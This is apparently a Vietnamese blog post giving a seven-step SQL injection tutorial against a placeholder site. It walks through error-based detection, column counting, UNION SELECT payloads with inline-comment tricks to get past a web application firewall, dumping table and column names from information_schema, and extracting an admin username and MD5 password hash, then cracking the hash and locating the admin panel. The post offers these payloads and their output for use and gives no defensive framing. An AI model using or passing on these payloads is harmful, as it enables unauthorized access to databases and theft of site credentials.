Bước 1: Check lỗi

Thêm dấu ‘ vào sau con số của đường link có dạng id=

 http://www.domain.com/index.php?do=content&id=1'

Nếu giao diện website thay đổi nghĩa là site đã bị dính lỗi sqli


Bước 2:  Tìm số trường cột

 http://www.domain.com/index.php?do=content&id=1 order by 6-- -     giao diện site bình thường
 http://www.domain.com/index.php?do=content&id=1 order by 7-- -     giao diện site thay đổi

Vì vậy, số trường cột là 6

Bước 3: Xác định vị trí trường cột bị lỗi

 http://www.domain.com/index.php?do=content&id=-1 UNION SELECT 1,2,3,4,5,6-- -

Đến đây nếu khai thác bình thường sẽ bị chặn lại và xuất hiện 406 Not Acceptable, 80% site bị lỗi này chúng ta có thể bypass thành công bằng cách thêm /*!  */ ở  ở query “select”,  “table_name”, “tables “  và “column_name”.


 http://www.domain.com/index.php?do=content&id=-1 UNION /*!SELECT*/ 1,2,3,4,5,6-- -

Ta thấy xuất hiện số 3, nghĩa nghĩa tại vị trí sô 3, trường cột bị lỗi. Vì thế ta sẽ khai thác tại vị trí này.

Lưu ý phải có dấu – sau con số 1 để xuất hiện vị trí trường cột bị lỗi hay còn gọi là số đẹp.



Bước 4: Xuất ra tên các tables trong database


http://www.domain.com/index.php?do=content&id=-1  UNION /*!SELECT*/ 1,2,unhex(hex(group_concat(table_name))),4,5,6 from information_schema.tables where table_schema=database()-- -

Đến bước này cũng bị chặn và xuất hiện thông báo tương tự như trên, ta tiếp tục bypass bằng các thêm /*!  */ ở table_name và tables


http://www.domain.com/index.php?do=content&id=-1 /*!UNION*/ /*!SELECT*/ 1,2,unhex(hex(group_concat(/*!table_name*/))),4,5,6 from information_schema./*!tables*/ where /*!table_schema*/=database()-- -

Thông tin các tables thu được: 

admin,baogia,category,danhmuc,news,page,products,tygia

Tables chứa thông tin về username và password là admin. Vì vậy ta sẽ tiếp tục khai thác tables này.

Bước 5: Xuất ra tên các colums chứa username và password

http://www.domain.com/index.php?do=content&id=-1 UNION /*!SELECT*/ 1,2,unhex(hex(group_concat(/*!column_name*/))),4,5,6 from information_schema./*!columns*/ where /*!table_schema*/=database() and /*!table_name*/=0x61646d696e-- -

Thông tin các columns trong tables admin thu được:       
id,username,password,email

Lưu ý:    

     -          0x tạm hiểu là dùng để nhận dạng khi sử dụng ở dạng mã hex
     -         61646d696e là ký tự admin ở dạng hex.
     -          Link convert các ký tự sang mã hex:
       http://string-functions.com/string-hex.aspx 


Bước 6: Xuất ra thông tin của Username và Password

http://www.domain.com/index.php?do=content&id=-1 UNION /*!SELECT*/ 1,2,unhex(hex(group_concat(username,0x2f,password))),4,5,6 from admin-- -

Thông tin về username và password được mã hóa md5 thu được:

quyle/dee0266ac3ac3deb0e49a90e595afd64

Bước 7:  Crack Password và tìm link admin:
 -    Có nhiều site để crack passwd, ví dụ:
http://md5cracker.org/

Hoặc sử dụng google để tìm kiếm
               
 -  Sử dụng các tool để tìm link admin: Havij, Web admin finder

Nguồn: Mr.solein

Đăng nhận xét Blogger

 
Top